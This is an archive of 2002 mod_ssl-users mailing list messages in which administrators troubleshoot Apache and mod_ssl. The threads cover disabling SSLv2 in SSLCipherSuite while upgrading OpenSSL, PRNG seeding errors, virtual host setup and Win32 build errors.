NNTP-Posting-Date: Wed, 31 Jul 2002 19:22:08 +0000 (UTC)
Cc: freebsd-security@freebsd.org
X-Archive: encrypt
User-Agent: Gnus/5.090007 (Oort Gnus v0.07) XEmacs/21.4 (Common Lisp,
 i386--freebsd)
Cancel-Lock: sha1:tQ2z/mW695KCP8JrHT/5LK+4tQA=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aditya 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The FreeBSD Security Advisory FreeBSD-SA-02:33.openssl says:

  IV.  Workaround

  Disabling the SSL2 protocol in server applications should render
  server exploits harmless.  There is no known workaround for client
  applications.

and while I'm upgrading my systems, to limit my window of exposure, if
I restart my Apache servers, with:

  SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:-SSLv2:+EXP:+eNULL

(change +SSLv2 to -SSLv2) rather than the default:

  SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

will that be sufficient as a workaround?

Thanks,
Adi



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:42:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA08088; Thu, 1 Aug 2002 09:41:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id JAA08051; Thu, 1 Aug 2002 09:40:56 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 5C9FCBD2E; Thu,  1 Aug 2002 09:42:05 +0200 (CEST)
Date: Thu, 1 Aug 2002 09:42:05 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Regarding mod_ssl version which suits apache 2.0.39
Message-ID: <20020801074205.GA13762@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jul 31, 2002 at 02:14:21PM -0400, Venkat Reddy Valluri wrote:
> Hi,
>   Can you please let me know  where exactly i can get the suitable mod_ssl version which suits for apache 2.0.39, I tried to find out in www.modssl.org, but found out only the mod_ssl_2.8.10-1.3.26 which suits for apache 1.3.26, 
> 
Mod_ssl is part of apache 2.0.x and is included in the source
tarballs available at http://httpd.apache.org/dist/

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:54:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA09598; Thu, 1 Aug 2002 09:52:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id JAA09452; Thu, 1 Aug 2002 09:51:21 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id DAA20387;
	Thu, 1 Aug 2002 03:53:53 -0400
Date: Thu, 1 Aug 2002 03:53:52 -0400 (EDT)
From: "R. DuFresne" 
To: Venkat Reddy Valluri 
cc: modssl-users@modssl.org
Subject: Re: Regarding mod_ssl version which suits apache 2.0.39
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


none are required, it's built into the 2.0.x code.


Thanks,

Ron DuFresne

On Wed, 31 Jul 2002, Venkat Reddy Valluri wrote:

> Hi,
>   Can you please let me know  where exactly i can get the suitable mod_ssl version which suits for apache 2.0.39, I tried to find out in www.modssl.org, but found out only the mod_ssl_2.8.10-1.3.26 which suits for apache 1.3.26, 
> 
> Any help greatly apprecited
>  
> 
> Thks
> Venkata Reddy V
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:57:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA10068; Thu, 1 Aug 2002 09:55:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id JAA09774; Thu, 1 Aug 2002 09:53:54 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id JAA20321
	for ; Thu, 1 Aug 2002 09:53:47 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.4617);
	 Thu, 1 Aug 2002 09:50:04 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: MM doesn't work now with 0.9.6e - Security related Bug in mm < mm-1.2.1
Date: Thu, 1 Aug 2002 09:50:04 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB86ECD20@qeo00200>
Thread-Topic: MM doesn't work now with 0.9.6e
Thread-Index: AcI40aLHL+ypULrwS6mfXhoMf+CKGgAXjgqQ
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 01 Aug 2002 07:50:04.0934 (UTC) FILETIME=[0C6AE260:01C23930]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA09833
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

did you notice that there is a security bug in mm < version 1.2.1 as well which was announced on Jul 30 2002? Have a look here:

Advisory: http://www.openpkg.org/security/OpenPKG-SA-2002.007-mm.html (CERT ID "2002-453dcert").

You can get the latest version of mm here: http://www.ossp.org/pkg/lib/mm/


Kind regards,
B. Courtin



-----Original Message-----
From: David Lowenstein [mailto:dlowenst@mail.sdsu.edu]
Sent: Wednesday, July 31, 2002 10:33 PM
To: modssl-users@modssl.org
Subject: MM doesn't work now with 0.9.6e


I just installed the newest version of openssl and recompiled mm, mod_ssl,
mod_perl, and apache. Now when I start apache I get an error from my
httpd.conf file about the SSLSessionCache option. The error is:

SSLSessionCache: shared memory cache not useable on this platform

Well, it was with openssl 0.9.6c. I didn't do anything different in my
installation steps which were:

install openssl

configure mm with disable-shared
make

configure mod_ssl --with-apache=../apache_1.3.26

install mod_perl (perl Makefile.PL APACHE_SRC=../apache_1.3.26/src
DO_HTTPD=0 USE_APACI=1 PREP_HTTPD=1 EVERYTHING=1)

set SSL_BASE and EAPI_MM variables to ../openssl0.9.6e and ../mm-1.2.1

configure and install apache:

./configure --enable-module=proxy --enable-module=so
--activate-module=src/modules/perl/libperl.a --enable-module=perl
--enable-rule=SHARED_CORE --enable-module=ssl

make

make certificate

make install



Without the shared option in the config file, apache starts just fine, but
it won't work with:

SSLSessionCache        shm:/usr/local/apache/logs/ssl/ssl_scache(512000)

It worked before.

What did I break?


Dave Lowenstein
Programmer/Analyst
Instructional Technology Services
San Diego State University
(619)594-0270
http://www-rohan.sdsu.edu/dept/its

On Wed, 31 Jul 2002, Matt Nelson wrote:

> At 06:02 PM 7/31/2002 +0200, you wrote:
> >See comments,
> 
> Ditto,
> 
> >Rgds,
> >
> >Owen Boyle
> >
> > >-----Original Message-----
> > >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> > >Sent: Mittwoch, 31. Juli 2002 17:01
> > >To: modssl-users@modssl.org
> > >Subject: RE: Error message help
> > >
> > >
> > >Well I may have figured this out, https is now running, cert
> > >was in the wrong place,
> >
> >..or your SSLCertificateFile directive was pointing to the wrong place :-)
> 
> Yup, but dang I was confused on where it went.  Everything I've read said 
> put it somewhere different.  Error logs are you friends.
> 
> 
> > > ...but https returns the default web page for the apache
> > >installation, instead of the real site, which does come up with just
> > >http.  I think I can figure that out, but if anyone has pointer
> > >thanks,  and thanks for suffering my dumb questions.
> >
> >Check out your DocumentRoot directive in the SSL virtual host - there 
> >should only be one. If there is more than one, apache will use the last 
> >one... It is this directive which tells apache where to fetch the content.
> 
> Yeah I found that right after I wrote that.
> 
> > >
> > >--
> > >Matt
> > >
> > >
> > >At 09:36 AM 7/31/2002 -0500, you wrote:
> > >>At 03:56 PM 7/31/2002 +0200, you wrote:
> > >>> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> > >>> >
> > >>> >Now, the error I'm getting now  that I can't seem to find any
> > >>> >help on, in
> > >>> >the error_log is:
> > >>> >
> > >>> >OpenSSL: error:0D06B078:asn1 encoding
> > >routines:ASN1_get_object:header
> > >>> too long
> > >>> >
> > >>>
> > >>>Unusual.. Do you see anything in the browser? Also:
> > >>>
> > >>>- What versions of apache, mod_ssl, openssl?
> > >>
> > >>
> > >>Apache 1.3.22
> > >>OpenSSL 0.9.6
> > >>mod_ssl 1.4
> >
> >Um... If I were you, I'd get apache 1.3.26, OpenSSL 0.9.6e and mod_ssl 
> >2.8.10. That's teh latest mix, also pay attention to the security advisory 
> >that was posted to the list today.
> 
> I'll do that.
> 
> 
> > >>
> > >>>- Static or DSO?
> >
> >When you compiled apache, did you statically compile in mod_ssl (i.e. 
> >--enable-module=ssl) so that the mod_ssl binary gets munged in with the 
> >apache binary to produce a big binary *or* did you compile mod_ssl as a 
> >shared object which would be loaded dynamically at runtime (DSO = Dynamic 
> >Shared Object), i.e. --enable-shared=ssl? Usually, it doesn't make much 
> >difference when they're working, but since yours was not working, I 
> >thought I'd ask.
> 
> I didn't compile, I used everything stock from the Caldera 3.11 server 
> install. A bad idea now I know, if I'd done it on my own or recompiled, I'd 
> know which it was, among other things.
> 
> > >>
> > >>
> > >>I'll be honest and say I don't quite understand that
> > >question.  I'm way
> > >>more new at this what I wished.  I could probably answer that
> > >question, if
> > >>asked in different terms.
> > >>
> > >>>- What browser?
> > >>
> > >>IE, Mozilla, you name it.
> >
> >Just in case it was a funny browser - SSL is as much to do with the client 
> >as it is to do with the server so it is essential to verify any problems 
> >with several browsers. But you've already done that.
> 
> Yeah...  See I do try, I hate being a clueless newbie, or at least acting 
> like one.  I always try to cover the bases myself, so I don't get RTFM 
> responses.  I'm sure I'll have some other questions, though, and soon.
> 
> Thanks much
> 
> --
> Matt
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 10:05:42 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA11258; Thu, 1 Aug 2002 10:04:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id KAA11034; Thu, 1 Aug 2002 10:02:08 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id KAA21185
	for ; Thu, 1 Aug 2002 10:02:03 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.4617);
	 Thu, 1 Aug 2002 09:58:21 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: PRNG errors
Date: Thu, 1 Aug 2002 09:58:20 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB80120BEA9@qeo00200>
Thread-Topic: PRNG errors
Thread-Index: AcI4+Mtog54nPtgsQqmMsyGpvM57XgAOA6tw
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 01 Aug 2002 07:58:21.0024 (UTC) FILETIME=[341C3600:01C23931]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA11149
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

the combination of software you use works fine for me on solaris 8.

However, when using these versions, I faced the following probelm:

-> apache wont start up with the option "SSLRandomSeed startup builtin" enabled. I then installed the package "ANDIrand-0.7-5.8-sparc-1.pkg" from "http://www.cosy.sbg.ac.at/~andi/" which provides a /dev/random resp. /dev/urandom. 

Using this (SSLRandomSeed startup file:/dev/urandom 1024) my apache starts up fine.

So:
 - Does OpenBSD have a /dev/urandom? -> Try using it-
 - If not, maybe the package I stated above is available for OpenBSD as well.


Kind regards,
B. Courtin


BTW: For all those using mm: Please notice that there is a security bug in mm < version 1.2.1 as well which was announced on Jul 30 2002? Have a look here:

Advisory: http://www.openpkg.org/security/OpenPKG-SA-2002.007-mm.html (CERT ID "2002-453dcert").

You can get the latest version of mm here: http://www.ossp.org/pkg/lib/mm/





-----Original Message-----
From: cbenn [mailto:benn@www.antimouse.com]
Sent: Wednesday, July 31, 2002 7:10 PM
To: modssl-users@modssl.org
Subject: PRNG errors


Hello everyone.

I just upgraded my OpenSSL yesterday from 9.6c to 9.6e, then recompiled my
mod_ssl-2.8.10-1.3.26 and Apache on OpenBSD 3.0. Everything seemed to go
fine, but now all my https request are unable to connect. According to all
the docs I've seen the error message suggest changing the "SSLRandomSeed"
setting in the httpd.conf, however I've tried various setting, see the new
value for the "Seeding PRNG" line in the log, but the handshake still
fails with the same error message. Can anyone suggest anything else that
maybe the issue.

Thanks,
benn

####From httpd.conf####
#   Pseudo Random Number Generator (PRNG):
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

####From ssl_engine_log####
[31/Jul/2002 09:49:00 30490] [info]  Connection to child 3 established
(server www.host.com:443, client 127.0.0.1)
[31/Jul/2002 09:49:00 30490] [info]  Seeding PRNG with 1160 bytes of
entropy
[31/Jul/2002 09:49:00 30490] [error] SSL handshake failed (server
www.host.com:443, client 127.0.0.1) (OpenSSL library error follows)
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:1409B005:SSL
routines:SSL3_SEND_SERVER_KEY_EXCHANGE:bad asn1 object header
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 12:28:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21966; Thu, 1 Aug 2002 12:27:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0017.ix.itaction.net id MAA21933; Thu, 1 Aug 2002 12:27:06 +0200 (MET DST)
Received: from localhost ([127.0.0.1] helo=itaction.co.uk)
	by it0017.ix.itaction.net with esmtp (Exim 4.05)
	id 17aDAg-0006e8-00
	for modssl-users@modssl.org; Thu, 01 Aug 2002 10:27:06 +0000
Message-ID: <3D490CF9.2040707@itaction.co.uk>
Date: Thu, 01 Aug 2002 11:27:05 +0100
From: Peter Viertel 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1a) Gecko/20020611
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: turning of SSL v2 in modssl
References: <20020801012509.GA82376@mighty.grot.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Viertel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

that will turn it off...see refguide at  
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC9

I wonder if it's time to leave SSLv2 off completely? how many browsers 
out there dont work with v3 these days?

Aditya wrote:

>Is it sufficient to change:
>
> +SSLv2
>
>to 
>
> -SSLv2
>
>in SSLCipherSuite to disable SSLv2 in modssl? Is that enough to at least
>temporarily limit the exposure to the latest openssl vulnerability while I
>upgrade multiple machines?
>
>Thanks,
>Adi
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 14:14:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA29316; Thu, 1 Aug 2002 14:13:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from netplex.aperion.com id OAA29250; Thu, 1 Aug 2002 14:12:09 +0200 (MET DST)
Received: (qmail 16797 invoked by alias); 1 Aug 2002 12:03:41 -0000
Received: from unknown (HELO cblanzy) (64.109.152.150)
  by 0 with SMTP; 1 Aug 2002 12:03:41 -0000
Message-ID: <000701c23954$aacdb800$4500000a@cblanzy>
From: "Craig Blanzy" 
To: 
References: <3D482278.6AF1F5CB@gsfc.nasa.gov>
Subject: Re: Help configuring Virutal Hosts
Date: Thu, 1 Aug 2002 08:12:12 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Craig Blanzy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm having troubles as well, I can connect at www.somedomain.com:443 but the
connection is standard http?  I can't get an https connection, if i look at
the logs i see

[Wed Jul 31 14:01:56 2002] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]

[Wed Jul 31 14:02:34 2002] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]

[Wed Jul 31 14:40:47 2002] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]

[Wed Jul 31 14:40:48 2002] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]

[Wed Jul 31 14:41:08 2002] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]



Gee i wish i spoke ssl :-/

This is actually a log from a virtual host i'm trying to run on port 8050 by
adding another listen directive in the ssl.conf file.  Is that normal?  or
should all my ssl traffic be directed to port 443 ?

----- Original Message -----
From: "Nick Burke" 
To: 
Sent: Wednesday, July 31, 2002 1:46 PM
Subject: Help configuring Virutal Hosts


> To anyone -
>
> I am attempting to setup Apache-SSL on a large server where most access
> is thru normal
> port 80 communications but I have three VirtualHosts that require port
> 443 SSL communications.
> We have our certificate (via Thawte). I've tried the port and
> SSLEnable/SSLDisable directives
> inside the VH definitions but it hangs our server.... Any thoughts?
>
> Nick Burke
> GSFC/NASA
> nick.burke@gsfc.nasa.gov
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 14:57:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA01712; Thu, 1 Aug 2002 14:56:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts26-srv.bellnexxia.net id OAA01699; Thu, 1 Aug 2002 14:55:53 +0200 (MET DST)
Received: from sympatico.ca ([64.231.120.122])
          by tomts12-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020622005517.HBGK2688.tomts12-srv.bellnexxia.net@sympatico.ca>
          for ; Fri, 21 Jun 2002 20:55:17 -0400
Message-ID: <3D13CB04.1010606@sympatico.ca>
Date: Fri, 21 Jun 2002 20:55:32 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Trouble building on Win32
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Noah White wrote:
> The server build OK, it only croaks when trying to build with mod_ssl.
> Here's my include PATH, I don't notice anything in particular wrong with it.
> 
> Thanks,
> 
> -Noah
> 
> INCLUDE=c:\Program Files\Microsoft Visual Studio
> .NET\FrameworkSDK\include\;c:\Program Files\Microsoft Visual Studio
> .NET\FrameworkSDK\include\;c:\Program Files\Microsoft Visual Studio
> .NET\VC7\ATLMFC\INCLUDE;c:\Program Files\Microsoft Visual Studio
> .NET\VC7\INCLUDE;c:\Program Files\Microsoft Visual Studio
> .NET\VC7\PlatfromSDK\include\prerelease;c:\Program Files\Microsoft Visual
> Studio .NET\VC7\PlatformSDK\include;C:\Program Files\WMI\include
> 
> 
>>-----Original Message-----
>>From: Aryeh Katz [mailto:aryeh@vasco.com]
>>Sent: Thursday, June 20, 2002 5:29 PM
>>To: modssl-users@modssl.org
>>Subject: Re: Trouble building on Win32
>>
>>Is your win32 build environment set on the command line?
>>It looks like something is wrong with your include path.
>>run set, and see whether or not the correct value for include shows up.
>>
>>>I'm trying to bld 2.8.9-1.3.26 on Windows 2000 server with VC++ 7.0
>>>installed. I'm running into the following issues:
>>>
>>>1) When patching the sources I get the following:
>>>
>>>|+--------------------------------------------------------------------
>>>------ - || First patch APACI's configuration script to pass a `ssl'
>>>flag || to the Makefile.tmpl file which indicated whether mod_ssl is
>>>|| activated or not.  Second we add support for the SSL_BASE and ||
>>>RSA_BASE variables. Third we provide the configuration || adjustments
>>>of the HTTPS port (443) similar to what is || already done by APACI
>>>for the HTTP port (80).
>>>|+--------------------------------------------------------------------
>>>------ - |Index: configure |--- configure  19 Jun 2002 07:20:10 -0000
>>>    1.1.1.14 |+++ configure  19 Jun 2002 07:29:07 -0000      1.26
>>>-------------------------- File to patch:
>>>
>>>If I ignore that and skip that patch I get another issue here:
>>>
>>>|+--------------------------------------------------------------------
>>>------ - || Here we first incorporate support for the `make
>>>certificate' || procedure and second support for the `make install'
>>>procedure || where SSL directives in the configuration files are now
>>>also || adjusted and SSL certs/keys and support programs are now ||
>>>additionally installed.
>>>|+--------------------------------------------------------------------
>>>------ - |Index: Makefile.tmpl |--- Makefile.tmpl      27 Mar 2002
>>>15:22:49 -0000      1.1.1.12 |+++ Makefile.tmpl      27 Mar 2002
>>>15:30:01 -0000      1.44 -------------------------- File to patch:
>>>
>>>If I skip/ignore that I get another one:
>>>
>>>|
>>>|+--------------------------------------------------------------------
>>>------ - || Add additional SSL configuration directives which provide
>>>a || robust default configuration: virtual server on port 443 || which
>>>speaks SSL.
>>>|+--------------------------------------------------------------------
>>>------ - |Index: conf/httpd.conf-dist |--- conf/httpd.conf-dist
>>>27 Mar 2002 15:22:49 -0000      1.1.1.14 |+++ conf/httpd.conf-dist
>>>  27 Mar 2002 15:30:01 -0000      1.65 -------------------------- File
>>>to patch:
>>>
>>>For this one I directed it to patch conf/httpd.conf-dist-win and that
>>>seemed to work ok.
>>>
>>>After this the rest of the patch process completes and I am directed
>>>to build Apache.
>>>
>>>While building apache I get the following error:
>>>
>>>
>>>        cl.exe /nologo /c /O2 /MD /W3 /GX /DNDEBUG /DWIN32 /D_WINDOWS
>>>/DSHARED_M ODULE /DEAPI /DMOD_SSL=208109 /DMOD_SSL_VERSION=\"2.8.9\"
>>>/I..\..\include /I..\. .\os\win32 /Ic:\silverback\openssl\include
>>>mod_ssl.c mod_ssl.c c:\Program Files\Microsoft Visual Studio
>>>.NET\Vc7\PlatformSDK\Include\WinCrypt.h (37) : error C2061: syntax
>>>error : identifier 'HRESULT' c:\Program Files\Microsoft Visual Studio
>>>.NET\Vc7\PlatformSDK\Include\WinCrypt.h (37) : error C2059: syntax
>>>error : ';' c:\Program Files\Microsoft Visual Studio
>>>.NET\Vc7\PlatformSDK\Include\WinCrypt.h (243) : error C2061: syntax
>>>error : identifier 'HCRYPTPROV' c:\Program Files\Microsoft Visual
>>>Studio .NET\Vc7\PlatformSDK\Include\WinCrypt.h (243) : error C2059:
>>>syntax error : ';' c:\Program Files\Microsoft Visual Studio
>>>.NET\Vc7\PlatformSDK\Include\WinCrypt.h (244) : error C2061: syntax
>>>error : identifier 'HCRYPTKEY' c:\Program Files\Microsoft Visual
>>>Studio .NET\Vc7\PlatformSDK\Include\WinCrypt.h (244) : error C2059:
>>>syntax error : ';' c:\Program Files\Microsoft Visual Studio
>>>.NET\Vc7\PlatformSDK\Include\WinCrypt.h
>>>
>>>Any thoughts on these issues? Thanks,
>>>
>>>-Noah
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>
>>
>>---
>>Aryeh Katz
>>VASCO
>>www.vasco.com
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

The lines of your note have odd breaks (spaces) but I expect this is 
from the mail - otherwise it looks ok.

I have successfully compiled Apache 2.0.39 (with mod_ssl) with VC7 but I 
had some problems.  openssl want to be built with my older perl but I 
needed a new cygwin (bison and flex) to correctly build apache with the 
mod_ssl included.  Bison was getting a syntax error and I had similar 
errors to yours (but at a different spot).  I have built the code both 
in and out of the IDE.

I am missing some of your infomation .. version of apache for instance.
Are you building from makefile.win or from within the IDE.  If you build 
from within the GUI pay particular attention to configuring the location 
of the tools (awk, bison and flex) it does not use the path.

What you have here are compile errors that are typical of missing 
typedef's.  I am not familiar with the mod_ssl.c and have not seen a 
cause but it is clear that the following typedefs are missing .. 
probably more.

#ifndef _HRESULT_DEFINED
#define _HRESULT_DEFINED
typedef LONG HRESULT;    ... this is line 37
#endif // !_HRESULT_DEFINED

...missing typedef for LONG causes error on line 37

WinCrypt.h (37) : error C2061: syntax error : identifier 'HRESULT'
WinCrypt.h (37) : error C2059: syntax error : ';'

typedef ULONG_PTR HCRYPTPROV;
typedef ULONG_PTR HCRYPTKEY;
